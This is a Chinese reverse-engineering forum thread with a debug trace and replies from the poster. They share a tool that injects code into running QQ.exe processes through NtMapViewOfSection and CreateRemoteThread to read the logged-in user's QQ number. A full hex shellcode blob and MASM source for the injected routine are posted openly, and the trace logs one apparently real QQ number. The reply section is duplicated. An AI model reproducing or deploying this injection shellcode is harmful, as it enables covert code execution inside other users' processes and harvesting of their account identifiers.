00000124 10.54593468 [5112] MyIAT:lstrcmpiA (addr info.szExeFile,"QQ.exe")
00000125 10.54596519 [5112] MyIAT:Process32Next (handle,addr info)
00000126 10.54600143 [5112] MyIAT:lstrcmpiA (addr info.szExeFile,"QQ.exe")
00000127 10.54603195 [5112] MyIAT:Process32Next (handle,addr info)
00000128 10.54607105 [5112] MyIAT:lstrcmpiA (addr info.szExeFile,"QQ.exe")
00000129 10.54610252 [5112] MyIAT:Process32Next (handle,addr info)
00000130 10.54613876 [5112] MyIAT:lstrcmpiA (addr info.szExeFile,"QQ.exe")
00000131 10.54617119 [5112] MyIAT:OpenProcess (4095,0,info.th32ProcessID)
00000132 10.54664135 [5112] MyIAT:NtMapViewOfSection (hMappedFile,hProcess1,addr ViewBase1,0,0,0,addr ViewSize,1,0,PAGE_EXECUTE_READWRITE)
00000133 10.54668427 [5112] MyIAT:CreateRemoteThread (hProcess1,0,0,ViewBase1,0,0,0)
00000134 10.54684258 [5112] MyIAT:WaitForSingleObject (hRemoteThread,INFINITE)
00000135 10.54902363 [5216] Debug mode!
00000136 10.54912949 [5216] injectIAT:GetModuleHandleA ("KernelUtil.dll")
00000137 10.54917145 [5216] injectIAT:GetProcAddress (eax,"?GetSelfUin@Contact@Util@@YAKXZ")
00000138 10.54944611 [5112] MyIAT:GetExitCodeThread (hRemoteThread,addr Return_Value)
00000139 10.54951668 [5112] MyIAT:wsprintfA (addr @QQUid,"获取到QQ号:%d",Return_Value)
00000140 10.54955769 [5112] MyIAT:OutputDebugStringA (addr @QQUid)
00000141 10.54959297 [5112] 获取到QQ号:1067968022
00000142 10.54962349 [5112] MyIAT:CloseHandle (hRemoteThread)
00000143 10.54966354 [5112] MyIAT:CloseHandle (hProcess1)
00000144 10.54969597 [5112] MyIAT:Process32Next (handle,addr info)
00000145 10.54974365 [5112] MyIAT:lstrcmpiA (addr info.szExeFile,"QQ.exe")
00000146 10.54979992 [5112] MyIAT:OpenProcess (4095,0,info.th32ProcessID)
00000147 10.54984188 [5112] MyIAT:NtMapViewOfSection (hMappedFile,hProcess1,addr ViewBase1,0,0,0,addr ViewSize,1,0,PAGE_EXECUTE_READWRITE)
00000148 10.54989052 [5112] MyIAT:CreateRemoteThread (hProcess1,0,0,ViewBase1,0,0,0)
00000149 10.55005360 [5112] MyIAT:WaitForSingleObject (hRemoteThread,INFINITE)
00000150 10.55031776 [5988] Debug mode!
00000151 10.55035591 [5988] injectIAT:GetModuleHandleA ("KernelUtil.dll")
00000152 10.55038071 [5988] injectIAT:GetProcAddress (eax,"?GetSelfUin@Contact@Util@@YAKXZ")
00000153 10.55056095 [5112] MyIAT:GetExitCodeThread (hRemoteThread,addr Return_Value)
00000154 10.55061531 [5112] MyIAT:wsprintfA (addr @QQUid,"获取到QQ号:%d",Return_Value)
00000155 10.55064774 [5112] MyIAT:OutputDebugStringA (addr @QQUid)
00000156 10.55067635 [5112] 获取到QQ号:xxxxxx隐藏
00000157 10.55070591 [5112] MyIAT:CloseHandle (hRemoteThread)
00000158 10.55073643 [5112] MyIAT:CloseHandle (hProcess1)
00000159 10.55076599 [5112] MyIAT:Process32Next (handle,addr info)
00000160 10.55080891 [5112] MyIAT:lstrcmpiA (addr info.szExeFile,"QQ.exe")
00000161 10.55084229 [5112] MyIAT:Process32Next (handle,addr info)
00000162 10.55088806 [5112] MyIAT:lstrcmpiA (addr info.szExeFile,"QQ.exe")
00000163 10.55091858 [5112] MyIAT:Process32Next (handle,addr info)
00000164 10.55095577 [5112] MyIAT:lstrcmpiA (addr info.szExeFile,"QQ.exe")
00000165 10.55098629 [5112] MyIAT:Process32Next (handle,addr info)
00000166 10.55102444 [5112] MyIAT:lstrcmpiA (addr info.szExeFile,"QQ.exe")
00000167 10.55105495 [5112] MyIAT:Process32Next (handle,addr info)
00000168 10.55109310 [5112] MyIAT:lstrcmpiA (addr info.szExeFile,"QQ.exe")
00000169 10.55112267 [5112] MyIAT:Process32Next (handle,addr info)
00000170 10.55116081 [5112] MyIAT:lstrcmpiA (addr info.szExeFile,"QQ.exe")
00000171 10.55119133 [5112] MyIAT:Process32Next (handle,addr info)
00000172 10.55123043 [5112] MyIAT:lstrcmpiA (addr info.szExeFile,"QQ.exe")
00000173 10.55125999 [5112] MyIAT:Process32Next (handle,addr info)
00000174 10.55129528 [5112] MyIAT:CloseHandle (handle)
00000175 10.55133057 [5112] MyIAT:CloseHandle (hProcess2)

[课程]Android-CTF解题方法汇总！

上传的附件：

GetQQUid.rar （6.92kb，41次下载）

收藏・4

免费・0

支持

最新回复 (5)
Mx￠Xgt 雪币： 656 活跃值： (448) 能力值： ( LV12，RANK：360 ) 在线值：发帖 77 回帖 583 粉丝 4 关注私信	Mx￠Xgt 7 2 楼这个是非调试输出版本: E9 C5 01 00 00 55 8B EC 83 C4 F8 60 83 EC 10 83 24 24 00 1E 0F A0 1F 33 C0 40 D1 E0 40 C1 E0 04 8B 00 1F 8B 40 0C 8B 70 1C 33 C9 8B 46 08 8B 7E 20 8B 36 66 39 4F 18 75 F2 8B D0 8B 42 3C 8B 44 10 78 03 C2 8B 70 20 03 F2 E8 0F 00 00 00 47 65 74 50 72 6F 63 41 64 64 72 65 73 73 00 33 C9 8B 3E 03 FA 56 8B 74 24 04 51 B9 0F 00 00 00 F3 A6 74 0B 59 5E 83 C6 04 41 3B 48 18 72 E2 59 83 C4 08 8B 70 24 03 F2 0F B7 0C 4E 8B 70 1C 03 F2 8B 34 8E 03 F2 8B FA 89 74 24 04 E8 0D 00 00 00 4C 6F 61 64 4C 69 62 72 61 72 79 41 00 57 FF D6 89 44 24 08 E8 11 00 00 00 47 65 74 4D 6F 64 75 6C 65 48 61 6E 64 6C 65 41 00 57 FF D6 89 44 24 0C E8 0A 00 00 00 4B 65 72 6E 65 6C 33 32 00 02 5E E8 20 00 00 00 47 65 74 4D 6F 64 75 6C 65 48 61 6E 64 6C 65 41 00 47 65 74 50 72 6F 63 41 64 64 72 65 73 73 00 5F B9 01 00 00 00 EB 4E 51 56 FF 54 24 14 0B C0 75 05 56 FF 54 24 10 0B C0 74 39 8B D8 56 E8 3D 00 00 00 8D 74 30 02 0F B6 4E FF EB 23 51 57 53 FF 54 24 14 0B C0 74 0C 8B 4C 24 08 89 44 8D F8 FF 44 24 08 57 E8 16 00 00 00 8D 7C 38 01 59 49 0B C9 75 D9 59 49 0B C9 75 AE 83 C4 10 61 EB 17 57 8B 7C 24 08 B9 FF FF FF FF 33 C0 F2 AE F7 D1 49 8B C1 5F C2 04 00 E8 0F 00 00 00 4B 65 72 6E 65 6C 55 74 69 6C 2E 64 6C 6C 00 FF 55 F8 0B C0 74 31 E8 20 00 00 00 3F 47 65 74 53 65 6C 66 55 69 6E 40 43 6F 6E 74 61 63 74 40 55 74 69 6C 40 40 59 41 4B 58 5A 00 50 FF 55 FC 0B C0 74 04 FF D0 C9 C3 33 C0 55 8B EC 81 C4 58 FE FF FF 60 60 83 EC 10 83 24 24 00 1E 0F A0 1F 33 C0 40 D1 E0 40 C1 E0 04 8B 00 1F 8B 40 0C 8B 70 1C 33 C9 8B 46 08 8B 7E 20 8B 36 66 39 4F 18 75 F2 8B D0 8B 42 3C 8B 44 10 78 03 C2 8B 70 20 03 F2 E8 0F 00 00 00 47 65 74 50 72 6F 63 41 64 64 72 65 73 73 00 33 C9 8B 3E 03 FA 56 8B 74 24 04 51 B9 0F 00 00 00 F3 A6 74 0B 59 5E 83 C6 04 41 3B 48 18 72 E2 59 83 C4 08 8B 70 24 03 F2 0F B7 0C 4E 8B 70 1C 03 F2 8B 34 8E 03 F2 8B FA 89 74 24 04 E8 0D 00 00 00 4C 6F 61 64 4C 69 62 72 61 72 79 41 00 57 FF D6 89 44 24 08 E8 11 00 00 00 47 65 74 4D 6F 64 75 6C 65 48 61 6E 64 6C 65 41 00 57 FF D6 89 44 24 0C E8 23 00 00 00 4B 65 72 6E 65 6C 33 32 00 0E 4B 65 72 6E 65 6C 33 32 00 02 6E 74 64 6C 6C 00 01 75 73 65 72 33 32 00 01 5E E8 23 01 00 00 47 65 74 4D 6F 64 75 6C 65 48 61 6E 64 6C 65 41 00 47 65 74 50 72 6F 63 41 64 64 72 65 73 73 00 50 72 6F 63 65 73 73 33 32 46 69 72 73 74 00 43 72 65 61 74 65 54 6F 6F 6C 68 65 6C 70 33 32 53 6E 61 70 73 68 6F 74 00 6C 73 74 72 63 6D 70 69 41 00 50 72 6F 63 65 73 73 33 32 4E 65 78 74 00 43 6C 6F 73 65 48 61 6E 64 6C 65 00 43 72 65 61 74 65 52 65 6D 6F 74 65 54 68 72 65 61 64 00 4F 70 65 6E 50 72 6F 63 65 73 73 00 4C 6F 61 64 4C 69 62 72 61 72 79 41 00 57 61 69 74 46 6F 72 53 69 6E 67 6C 65 4F 62 6A 65 63 74 00 47 65 74 45 78 69 74 43 6F 64 65 54 68 72 65 61 64 00 43 72 65 61 74 65 46 69 6C 65 4D 61 70 70 69 6E 67 41 00 47 65 74 43 75 72 72 65 6E 74 50 72 6F 63 65 73 73 49 64 00 52 74 6C 4D 6F 76 65 4D 65 6D 6F 72 79 00 4F 75 74 70 75 74 44 65 62 75 67 53 74 72 69 6E 67 41 00 4E 74 4D 61 70 56 69 65 77 4F 66 53 65 63 74 69 6F 6E 00 77 73 70 72 69 6E 74 66 41 00 5F B9 04 00 00 00 EB 4E 51 56 FF 54 24 14 0B C0 75 05 56 FF 54 24 10 0B C0 74 39 8B D8 56 E8 3D 00 00 00 8D 74 30 02 0F B6 4E FF EB 23 51 57 53 FF 54 24 14 0B C0 74 0C 8B 4C 24 08 89 44 8D B8 FF 44 24 08 57 E8 16 00 00 00 8D 7C 38 01 59 49 0B C9 75 D9 59 49 0B C9 75 AE 83 C4 10 61 EB 17 57 8B 7C 24 08 B9 FF FF FF FF 33 C0 F2 AE F7 D1 49 8B C1 5F C2 04 00 C7 85 74 FE FF FF 00 10 00 00 6A 00 68 00 10 00 00 6A 00 6A 40 6A 00 6A FF FF 55 E8 89 85 80 FE FF FF FF 55 EC 50 6A 00 68 FF 0F 1F 00 FF 55 D8 89 85 84 FE FF FF 83 A5 78 FE FF FF 00 6A 40 6A 00 6A 01 8D 85 74 FE FF FF 50 6A 00 6A 00 6A 00 8D 85 78 FE FF FF 50 FF B5 84 FE FF FF FF B5 80 FE FF FF FF 55 F8 83 F8 00 0F 82 73 01 00 00 E8 00 00 00 00 81 2C 24 D5 14 40 00 58 8D 80 05 10 40 00 89 85 70 FE FF FF 68 C5 01 00 00 FF B5 70 FE FF FF FF B5 78 FE FF FF FF 55 F0 6A 00 6A 02 FF 55 C4 89 85 8C FE FF FF C7 85 90 FE FF FF 28 01 00 00 8D 85 90 FE FF FF 50 FF B5 8C FE FF FF FF 55 C0 E8 07 00 00 00 51 51 2E 65 78 65 00 8D 85 B4 FE FF FF 50 FF 55 C8 0B C0 0F 85 E0 00 00 00 FF B5 98 FE FF FF 6A 00 68 FF 0F 00 00 FF 55 D8 0B C0 0F 84 C8 00 00 00 89 85 88 FE FF FF 83 A5 7C FE FF FF 00 C7 85 74 FE FF FF 00 10 00 00 6A 40 6A 00 6A 01 8D 85 74 FE FF FF 50 6A 00 6A 00 6A 00 8D 85 7C FE FF FF 50 FF B5 88 FE FF FF FF B5 80 FE FF FF FF 55 F8 83 F8 00 72 7A 6A 00 6A 00 6A 00 FF B5 7C FE FF FF 6A 00 6A 00 FF B5 88 FE FF FF FF 55 D4 0B C0 74 5D 89 85 6C FE FF FF 6A FF FF B5 6C FE FF FF FF 55 E0 8D 85 68 FE FF FF 50 FF B5 6C FE FF FF FF 55 E4 56 8B F4 FF B5 68 FE FF FF E8 0E 00 00 00 BB F1 C8 A1 B5 BD 51 51 BA C5 3A 25 64 00 8D 85 58 FE FF FF 50 FF 55 FC 8D 85 58 FE FF FF 50 FF 55 F4 8B E6 5E FF B5 6C FE FF FF FF 55 D0 FF B5 88 FE FF FF FF 55 D0 8D 85 90 FE FF FF 50 FF B5 8C FE FF FF FF 55 CC 0B C0 0F 85 EA FE FF FF FF B5 8C FE FF FF FF 55 D0 FF B5 84 FE FF FF FF 55 D0 61 C9 C3 2013-1-6 00:52 0
NearGray 雪币： 164 活跃值： (39) 能力值： ( LV3，RANK：20 ) 在线值：发帖 5 回帖 86 粉丝 0 关注私信	NearGray 3 楼支持楼主，膜拜，看一下，菜鸟刚上路 2013-1-6 01:41 0
loongzyd 雪币： 1015 活跃值： (235) 能力值： ( LV12，RANK：440 ) 在线值：发帖 191 回帖 1111 粉丝 4 关注私信	loongzyd 10 4 楼前排站位，楼主辛苦了！ 2013-1-6 09:17 0
nsso 雪币： 156 活跃值： (27) 能力值： ( LV3，RANK：20 ) 在线值：发帖 12 回帖 169 粉丝 0 关注私信	nsso 5 楼前排支持。。。 2013-1-6 13:29 0
Mx￠Xgt 雪币： 656 活跃值： (448) 能力值： ( LV12，RANK：360 ) 在线值：发帖 77 回帖 583 粉丝 4 关注私信	Mx￠Xgt 7 6 楼 injectCode proc %echo injectCode,__GetBuffSize__,num2str(__GetBuffSize__(injectIAT)) local APIArrayBuff[__GetBuffSize__(injectIAT)]:DWORD LdrImport injectIAT,APIArrayBuff ;载入所有导入表中的APi ImportApiCall GetModuleHandleA,"KernelUtil.dll" .if eax ImportApiCall GetProcAddress,eax,"?GetSelfUin@Contact@Util@@YAKXZ" .if eax call eax ; get qq num return eax ret .endif .endif xor eax,eax [COLOR="Red"]ret[/COLOR] injectCode endp 漏写了一个ret 2013-1-7 20:39 0
	游客登录 \| 注册方可回帖回帖表情雪币赚取及消费高级回复

Mx￠Xgt

发帖

583

回帖

360

RANK

关注

私信

他的文章

关于我们

联系我们

企业服务

看雪公众号

最新回复 (5)
Mx￠Xgt 雪币： 656 活跃值： (448) 能力值： ( LV12，RANK：360 ) 在线值：发帖 77 回帖 583 粉丝 4 关注私信	Mx￠Xgt 7 2 楼这个是非调试输出版本: E9 C5 01 00 00 55 8B EC 83 C4 F8 60 83 EC 10 83 24 24 00 1E 0F A0 1F 33 C0 40 D1 E0 40 C1 E0 04 8B 00 1F 8B 40 0C 8B 70 1C 33 C9 8B 46 08 8B 7E 20 8B 36 66 39 4F 18 75 F2 8B D0 8B 42 3C 8B 44 10 78 03 C2 8B 70 20 03 F2 E8 0F 00 00 00 47 65 74 50 72 6F 63 41 64 64 72 65 73 73 00 33 C9 8B 3E 03 FA 56 8B 74 24 04 51 B9 0F 00 00 00 F3 A6 74 0B 59 5E 83 C6 04 41 3B 48 18 72 E2 59 83 C4 08 8B 70 24 03 F2 0F B7 0C 4E 8B 70 1C 03 F2 8B 34 8E 03 F2 8B FA 89 74 24 04 E8 0D 00 00 00 4C 6F 61 64 4C 69 62 72 61 72 79 41 00 57 FF D6 89 44 24 08 E8 11 00 00 00 47 65 74 4D 6F 64 75 6C 65 48 61 6E 64 6C 65 41 00 57 FF D6 89 44 24 0C E8 0A 00 00 00 4B 65 72 6E 65 6C 33 32 00 02 5E E8 20 00 00 00 47 65 74 4D 6F 64 75 6C 65 48 61 6E 64 6C 65 41 00 47 65 74 50 72 6F 63 41 64 64 72 65 73 73 00 5F B9 01 00 00 00 EB 4E 51 56 FF 54 24 14 0B C0 75 05 56 FF 54 24 10 0B C0 74 39 8B D8 56 E8 3D 00 00 00 8D 74 30 02 0F B6 4E FF EB 23 51 57 53 FF 54 24 14 0B C0 74 0C 8B 4C 24 08 89 44 8D F8 FF 44 24 08 57 E8 16 00 00 00 8D 7C 38 01 59 49 0B C9 75 D9 59 49 0B C9 75 AE 83 C4 10 61 EB 17 57 8B 7C 24 08 B9 FF FF FF FF 33 C0 F2 AE F7 D1 49 8B C1 5F C2 04 00 E8 0F 00 00 00 4B 65 72 6E 65 6C 55 74 69 6C 2E 64 6C 6C 00 FF 55 F8 0B C0 74 31 E8 20 00 00 00 3F 47 65 74 53 65 6C 66 55 69 6E 40 43 6F 6E 74 61 63 74 40 55 74 69 6C 40 40 59 41 4B 58 5A 00 50 FF 55 FC 0B C0 74 04 FF D0 C9 C3 33 C0 55 8B EC 81 C4 58 FE FF FF 60 60 83 EC 10 83 24 24 00 1E 0F A0 1F 33 C0 40 D1 E0 40 C1 E0 04 8B 00 1F 8B 40 0C 8B 70 1C 33 C9 8B 46 08 8B 7E 20 8B 36 66 39 4F 18 75 F2 8B D0 8B 42 3C 8B 44 10 78 03 C2 8B 70 20 03 F2 E8 0F 00 00 00 47 65 74 50 72 6F 63 41 64 64 72 65 73 73 00 33 C9 8B 3E 03 FA 56 8B 74 24 04 51 B9 0F 00 00 00 F3 A6 74 0B 59 5E 83 C6 04 41 3B 48 18 72 E2 59 83 C4 08 8B 70 24 03 F2 0F B7 0C 4E 8B 70 1C 03 F2 8B 34 8E 03 F2 8B FA 89 74 24 04 E8 0D 00 00 00 4C 6F 61 64 4C 69 62 72 61 72 79 41 00 57 FF D6 89 44 24 08 E8 11 00 00 00 47 65 74 4D 6F 64 75 6C 65 48 61 6E 64 6C 65 41 00 57 FF D6 89 44 24 0C E8 23 00 00 00 4B 65 72 6E 65 6C 33 32 00 0E 4B 65 72 6E 65 6C 33 32 00 02 6E 74 64 6C 6C 00 01 75 73 65 72 33 32 00 01 5E E8 23 01 00 00 47 65 74 4D 6F 64 75 6C 65 48 61 6E 64 6C 65 41 00 47 65 74 50 72 6F 63 41 64 64 72 65 73 73 00 50 72 6F 63 65 73 73 33 32 46 69 72 73 74 00 43 72 65 61 74 65 54 6F 6F 6C 68 65 6C 70 33 32 53 6E 61 70 73 68 6F 74 00 6C 73 74 72 63 6D 70 69 41 00 50 72 6F 63 65 73 73 33 32 4E 65 78 74 00 43 6C 6F 73 65 48 61 6E 64 6C 65 00 43 72 65 61 74 65 52 65 6D 6F 74 65 54 68 72 65 61 64 00 4F 70 65 6E 50 72 6F 63 65 73 73 00 4C 6F 61 64 4C 69 62 72 61 72 79 41 00 57 61 69 74 46 6F 72 53 69 6E 67 6C 65 4F 62 6A 65 63 74 00 47 65 74 45 78 69 74 43 6F 64 65 54 68 72 65 61 64 00 43 72 65 61 74 65 46 69 6C 65 4D 61 70 70 69 6E 67 41 00 47 65 74 43 75 72 72 65 6E 74 50 72 6F 63 65 73 73 49 64 00 52 74 6C 4D 6F 76 65 4D 65 6D 6F 72 79 00 4F 75 74 70 75 74 44 65 62 75 67 53 74 72 69 6E 67 41 00 4E 74 4D 61 70 56 69 65 77 4F 66 53 65 63 74 69 6F 6E 00 77 73 70 72 69 6E 74 66 41 00 5F B9 04 00 00 00 EB 4E 51 56 FF 54 24 14 0B C0 75 05 56 FF 54 24 10 0B C0 74 39 8B D8 56 E8 3D 00 00 00 8D 74 30 02 0F B6 4E FF EB 23 51 57 53 FF 54 24 14 0B C0 74 0C 8B 4C 24 08 89 44 8D B8 FF 44 24 08 57 E8 16 00 00 00 8D 7C 38 01 59 49 0B C9 75 D9 59 49 0B C9 75 AE 83 C4 10 61 EB 17 57 8B 7C 24 08 B9 FF FF FF FF 33 C0 F2 AE F7 D1 49 8B C1 5F C2 04 00 C7 85 74 FE FF FF 00 10 00 00 6A 00 68 00 10 00 00 6A 00 6A 40 6A 00 6A FF FF 55 E8 89 85 80 FE FF FF FF 55 EC 50 6A 00 68 FF 0F 1F 00 FF 55 D8 89 85 84 FE FF FF 83 A5 78 FE FF FF 00 6A 40 6A 00 6A 01 8D 85 74 FE FF FF 50 6A 00 6A 00 6A 00 8D 85 78 FE FF FF 50 FF B5 84 FE FF FF FF B5 80 FE FF FF FF 55 F8 83 F8 00 0F 82 73 01 00 00 E8 00 00 00 00 81 2C 24 D5 14 40 00 58 8D 80 05 10 40 00 89 85 70 FE FF FF 68 C5 01 00 00 FF B5 70 FE FF FF FF B5 78 FE FF FF FF 55 F0 6A 00 6A 02 FF 55 C4 89 85 8C FE FF FF C7 85 90 FE FF FF 28 01 00 00 8D 85 90 FE FF FF 50 FF B5 8C FE FF FF FF 55 C0 E8 07 00 00 00 51 51 2E 65 78 65 00 8D 85 B4 FE FF FF 50 FF 55 C8 0B C0 0F 85 E0 00 00 00 FF B5 98 FE FF FF 6A 00 68 FF 0F 00 00 FF 55 D8 0B C0 0F 84 C8 00 00 00 89 85 88 FE FF FF 83 A5 7C FE FF FF 00 C7 85 74 FE FF FF 00 10 00 00 6A 40 6A 00 6A 01 8D 85 74 FE FF FF 50 6A 00 6A 00 6A 00 8D 85 7C FE FF FF 50 FF B5 88 FE FF FF FF B5 80 FE FF FF FF 55 F8 83 F8 00 72 7A 6A 00 6A 00 6A 00 FF B5 7C FE FF FF 6A 00 6A 00 FF B5 88 FE FF FF FF 55 D4 0B C0 74 5D 89 85 6C FE FF FF 6A FF FF B5 6C FE FF FF FF 55 E0 8D 85 68 FE FF FF 50 FF B5 6C FE FF FF FF 55 E4 56 8B F4 FF B5 68 FE FF FF E8 0E 00 00 00 BB F1 C8 A1 B5 BD 51 51 BA C5 3A 25 64 00 8D 85 58 FE FF FF 50 FF 55 FC 8D 85 58 FE FF FF 50 FF 55 F4 8B E6 5E FF B5 6C FE FF FF FF 55 D0 FF B5 88 FE FF FF FF 55 D0 8D 85 90 FE FF FF 50 FF B5 8C FE FF FF FF 55 CC 0B C0 0F 85 EA FE FF FF FF B5 8C FE FF FF FF 55 D0 FF B5 84 FE FF FF FF 55 D0 61 C9 C3 2013-1-6 00:52 0
NearGray 雪币： 164 活跃值： (39) 能力值： ( LV3，RANK：20 ) 在线值：发帖 5 回帖 86 粉丝 0 关注私信	NearGray 3 楼支持楼主，膜拜，看一下，菜鸟刚上路 2013-1-6 01:41 0
loongzyd 雪币： 1015 活跃值： (235) 能力值： ( LV12，RANK：440 ) 在线值：发帖 191 回帖 1111 粉丝 4 关注私信	loongzyd 10 4 楼前排站位，楼主辛苦了！ 2013-1-6 09:17 0
nsso 雪币： 156 活跃值： (27) 能力值： ( LV3，RANK：20 ) 在线值：发帖 12 回帖 169 粉丝 0 关注私信	nsso 5 楼前排支持。。。 2013-1-6 13:29 0
Mx￠Xgt 雪币： 656 活跃值： (448) 能力值： ( LV12，RANK：360 ) 在线值：发帖 77 回帖 583 粉丝 4 关注私信	Mx￠Xgt 7 6 楼 injectCode proc %echo injectCode,__GetBuffSize__,num2str(__GetBuffSize__(injectIAT)) local APIArrayBuff[__GetBuffSize__(injectIAT)]:DWORD LdrImport injectIAT,APIArrayBuff ;载入所有导入表中的APi ImportApiCall GetModuleHandleA,"KernelUtil.dll" .if eax ImportApiCall GetProcAddress,eax,"?GetSelfUin@Contact@Util@@YAKXZ" .if eax call eax ; get qq num return eax ret .endif .endif xor eax,eax [COLOR="Red"]ret[/COLOR] injectCode endp 漏写了一个ret 2013-1-7 20:39 0
	游客登录 \| 注册方可回帖回帖表情雪币赚取及消费高级回复